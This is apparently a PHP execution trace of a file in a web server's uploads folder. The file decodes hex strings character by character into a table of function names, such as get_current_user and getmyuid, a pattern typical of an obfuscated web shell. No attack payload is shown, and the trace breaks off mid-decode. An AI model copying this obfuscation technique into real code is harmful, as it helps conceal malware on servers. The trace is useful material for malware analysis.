2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1209	0	0.045321	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1209	1	0.045332	722088
3	1209	R			101
3	1210	0	0.045344	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1210	1	0.045355	722048
3	1210	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1211	0	0.045386	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1211	1	0.045397	722088
3	1211	R			110
3	1212	0	0.045410	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1212	1	0.045421	722048
3	1212	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1200	1	0.045451	722008
2	1200	R			'strlen'
1		A						/var/www/html/uploads/1CTT.php	7	$func[60] = 'strlen'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1213	0	0.045485	722008	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'636f756e74'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1214	0	0.045526	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1214	1	0.045537	722088
3	1214	R			99
3	1215	0	0.045549	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1215	1	0.045561	722048
3	1215	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1216	0	0.045591	722072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1216	1	0.045604	722120
3	1216	R			111
3	1217	0	0.045616	722040	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1217	1	0.045628	722080
3	1217	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1218	0	0.045659	722072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1218	1	0.045671	722120
3	1218	R			117
3	1219	0	0.045683	722040	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1219	1	0.045697	722080
3	1219	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1220	0	0.045728	722072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1220	1	0.045739	722120
3	1220	R			110
3	1221	0	0.045752	722040	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1221	1	0.045763	722080
3	1221	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1222	0	0.045793	722072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1222	1	0.045805	722120
3	1222	R			116
3	1223	0	0.045817	722040	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1223	1	0.045829	722080
3	1223	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1213	1	0.045859	722040
2	1213	R			'count'
1		A						/var/www/html/uploads/1CTT.php	7	$func[61] = 'count'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1224	0	0.045892	722040	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'726f756e64'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1225	0	0.045933	722072	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1225	1	0.045944	722120
3	1225	R			114
3	1226	0	0.045957	722040	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1226	1	0.045968	722080
3	1226	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1227	0	0.045999	722104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1227	1	0.046011	722152
3	1227	R			111
3	1228	0	0.046023	722072	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1228	1	0.046035	722112
3	1228	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1229	0	0.046065	722104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1229	1	0.046078	722152
3	1229	R			117
3	1230	0	0.046090	722072	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1230	1	0.046101	722112
3	1230	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1231	0	0.046131	722104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1231	1	0.046143	722152
3	1231	R			110
3	1232	0	0.046155	722072	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1232	1	0.046166	722112
3	1232	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1233	0	0.046196	722104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1233	1	0.046208	722152
3	1233	R			100
3	1234	0	0.046220	722072	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1234	1	0.046231	722112
3	1234	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1224	1	0.046261	722072
2	1224	R			'round'
1		A						/var/www/html/uploads/1CTT.php	7	$func[62] = 'round'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1235	0	0.046294	722072	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6d696d655f636f6e74656e745f74797065'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 33
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1236	0	0.046336	722104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1236	1	0.046347	722152
3	1236	R			109
3	1237	0	0.046360	722072	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1237	1	0.046371	722112
3	1237	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1238	0	0.046402	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1238	1	0.046419	722184
3	1238	R			105
3	1239	0	0.046432	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1239	1	0.046443	722144
3	1239	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1240	0	0.046474	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1240	1	0.046486	722184
3	1240	R			109
3	1241	0	0.046498	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1241	1	0.046510	722144
3	1241	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1242	0	0.046540	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1242	1	0.046552	722184
3	1242	R			101
3	1243	0	0.046564	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1243	1	0.046576	722144
3	1243	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1244	0	0.046605	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1244	1	0.046626	722184
3	1244	R			95
3	1245	0	0.046642	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1245	1	0.046653	722144
3	1245	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1246	0	0.046683	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1246	1	0.046696	722184
3	1246	R			99
3	1247	0	0.046708	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1247	1	0.046719	722144
3	1247	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1248	0	0.046748	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1248	1	0.046760	722184
3	1248	R			111
3	1249	0	0.046772	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1249	1	0.046783	722144
3	1249	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1250	0	0.046814	722136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1250	1	0.046825	722184
3	1250	R			110
3	1251	0	0.046837	722104	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1251	1	0.046849	722144
3	1251	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1252	0	0.046879	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1252	1	0.046891	722192
3	1252	R			116
3	1253	0	0.046904	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1253	1	0.046915	722152
3	1253	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1254	0	0.046945	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1254	1	0.046957	722192
3	1254	R			101
3	1255	0	0.046969	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1255	1	0.046980	722152
3	1255	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1256	0	0.047011	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1256	1	0.047023	722192
3	1256	R			110
3	1257	0	0.047035	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1257	1	0.047046	722152
3	1257	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1258	0	0.047076	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1258	1	0.047088	722192
3	1258	R			116
3	1259	0	0.047100	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1259	1	0.047111	722152
3	1259	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1260	0	0.047144	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1260	1	0.047157	722192
3	1260	R			95
3	1261	0	0.047170	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1261	1	0.047181	722152
3	1261	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1262	0	0.047211	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1262	1	0.047222	722192
3	1262	R			116
3	1263	0	0.047235	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1263	1	0.047246	722152
3	1263	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1264	0	0.047276	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1264	1	0.047288	722192
3	1264	R			121
3	1265	0	0.047300	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1265	1	0.047312	722152
3	1265	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1266	0	0.047342	722144	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1266	1	0.047354	722192
3	1266	R			112
3	1267	0	0.047366	722112	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1267	1	0.047377	722152
3	1267	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1268	0	0.047407	722152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1268	1	0.047419	722200
3	1268	R			101
3	1269	0	0.047431	722120	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1269	1	0.047442	722160
3	1269	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1235	1	0.047472	722120
2	1235	R			'mime_content_type'
1		A						/var/www/html/uploads/1CTT.php	7	$func[63] = 'mime_content_type'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1270	0	0.047508	722120	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6765745f63757272656e745f75736572'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 31
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1271	0	0.047550	722152	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1271	1	0.047562	722200
3	1271	R			103
3	1272	0	0.047575	722120	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1272	1	0.047586	722160
3	1272	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1273	0	0.047616	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1273	1	0.047628	722232
3	1273	R			101
3	1274	0	0.047641	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1274	1	0.047652	722192
3	1274	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1275	0	0.047682	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1275	1	0.047694	722232
3	1275	R			116
3	1276	0	0.047706	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1276	1	0.047718	722192
3	1276	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1277	0	0.047748	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1277	1	0.047760	722232
3	1277	R			95
3	1278	0	0.047773	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1278	1	0.047784	722192
3	1278	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1279	0	0.047814	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1279	1	0.047826	722232
3	1279	R			99
3	1280	0	0.047838	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1280	1	0.047849	722192
3	1280	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1281	0	0.047886	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1281	1	0.047898	722232
3	1281	R			117
3	1282	0	0.047911	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1282	1	0.047935	722192
3	1282	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1283	0	0.047966	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1283	1	0.047978	722232
3	1283	R			114
3	1284	0	0.047990	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1284	1	0.048002	722192
3	1284	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1285	0	0.048032	722184	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1285	1	0.048044	722232
3	1285	R			114
3	1286	0	0.048056	722152	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1286	1	0.048068	722192
3	1286	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1287	0	0.048098	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1287	1	0.048109	722240
3	1287	R			101
3	1288	0	0.048121	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1288	1	0.048132	722200
3	1288	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1289	0	0.048162	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1289	1	0.048174	722240
3	1289	R			110
3	1290	0	0.048187	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1290	1	0.048198	722200
3	1290	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1291	0	0.048228	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1291	1	0.048240	722240
3	1291	R			116
3	1292	0	0.048252	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1292	1	0.048264	722200
3	1292	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1293	0	0.048294	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1293	1	0.048306	722240
3	1293	R			95
3	1294	0	0.048318	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1294	1	0.048330	722200
3	1294	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1295	0	0.048398	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1295	1	0.048411	722240
3	1295	R			117
3	1296	0	0.048424	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1296	1	0.048435	722200
3	1296	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1297	0	0.048465	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1297	1	0.048477	722240
3	1297	R			115
3	1298	0	0.048489	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1298	1	0.048500	722200
3	1298	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1299	0	0.048531	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1299	1	0.048542	722240
3	1299	R			101
3	1300	0	0.048554	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1300	1	0.048565	722200
3	1300	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1301	0	0.048595	722192	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1301	1	0.048607	722240
3	1301	R			114
3	1302	0	0.048619	722160	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1302	1	0.048630	722200
3	1302	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1270	1	0.048666	722168
2	1270	R			'get_current_user'
1		A						/var/www/html/uploads/1CTT.php	7	$func[64] = 'get_current_user'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1303	0	0.048702	722168	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6765746d79756964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1304	0	0.048743	722200	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1304	1	0.048755	722248
3	1304	R			103
3	1305	0	0.048767	722168	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1305	1	0.048779	722208
3	1305	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1306	0	0.048810	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1306	1	0.048822	722280
3	1306	R			101
3	1307	0	0.048834	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1307	1	0.048845	722240
3	1307	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1308	0	0.048875	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1308	1	0.048887	722280
3	1308	R			116
3	1309	0	0.048899	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1309	1	0.048911	722240
3	1309	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1310	0	0.048941	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1310	1	0.048952	722280
3	1310	R			109
3	1311	0	0.048964	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1311	1	0.048975	722240
3	1311	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1312	0	0.049005	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1312	1	0.049017	722280
3	1312	R			121
3	1313	0	0.049029	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1313	1	0.049040	722240
3	1313	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1314	0	0.049071	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1314	1	0.049083	722280
3	1314	R			117
3	1315	0	0.049095	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1315	1	0.049107	722240
3	1315	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1316	0	0.049137	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1316	1	0.049149	722280
3	1316	R			105
3	1317	0	0.049161	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1317	1	0.049172	722240
3	1317	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1318	0	0.049203	722232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1318	1	0.049215	722280
3	1318	R			100
3	1319	0	0.049227	722200	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1319	1	0.049238	722240
3	1319	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1303	1	0.049268	722208
2	1303	R			'getmyuid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[65] = 'getmyuid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1320	0	0.049303	722208	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6765746d79676964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1321	0	0.049344	722240	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1321	1	0.049361	722288
3	1321	R			103
3	1322	0	0.049374	722208	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1322	1	0.049386	722248
3	1322	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1323	0	0.049417	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1323	1	0.049429	722320
3	1323	R			101
3	1324	0	0.049441	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1324	1	0.049452	722280
3	1324	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1325	0	0.049482	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1325	1	0.049494	722320
3	1325	R			116
3	1326	0	0.049507	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1326	1	0.049518	722280
3	1326	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1327	0	0.049549	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1327	1	0.049561	722320
3	1327	R			109
3	1328	0	0.049573	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1328	1	0.049584	722280
3	1328	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1329	0	0.049615	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1329	1	0.049626	722320
3	1329	R			121
3	1330	0	0.049639	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1330	1	0.049650	722280
3	1330	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1331	0	0.049681	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1331	1	0.049692	722320
3	1331	R			103
3	1332	0	0.049705	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1332	1	0.049716	722280
3	1332	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1333	0	0.049746	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1333	1	0.049758	722320
3	1333	R			105
3	1334	0	0.049770	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1334	1	0.049781	722280
3	1334	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1335	0	0.049811	722272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1335	1	0.049823	722320
3	1335	R			100
3	1336	0	0.049835	722240	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1336	1	0.049846	722280
3	1336	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1320	1	0.049876	722248
2	1320	R			'getmygid'
1		A						/var/www/html/uploads/1CTT.php	7	$func[66] = 'getmygid'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1337	0	0.049910	722248	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'706f7369785f67657465756964'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 25
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1338	0	0.049952	722280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1338	1	0.049964	722328
3	1338	R			112
3	1339	0	0.049976	722248	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1339	1	0.049988	722288
3	1339	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1340	0	0.050018	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1340	1	0.050030	722360
3	1340	R			111
3	1341	0	0.050042	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1341	1	0.050053	722320
3	1341	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1342	0	0.050087	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1342	1	0.050099	722360
3	1342	R			115
3	1343	0	0.050112	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1343	1	0.050123	722320
3	1343	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1344	0	0.050153	722312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1344	1	0.050165	722360
3	1344	R			105
3	1345	0	0.050177	722280	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1345	1	0.050188	722320
3	1345	R			'i'
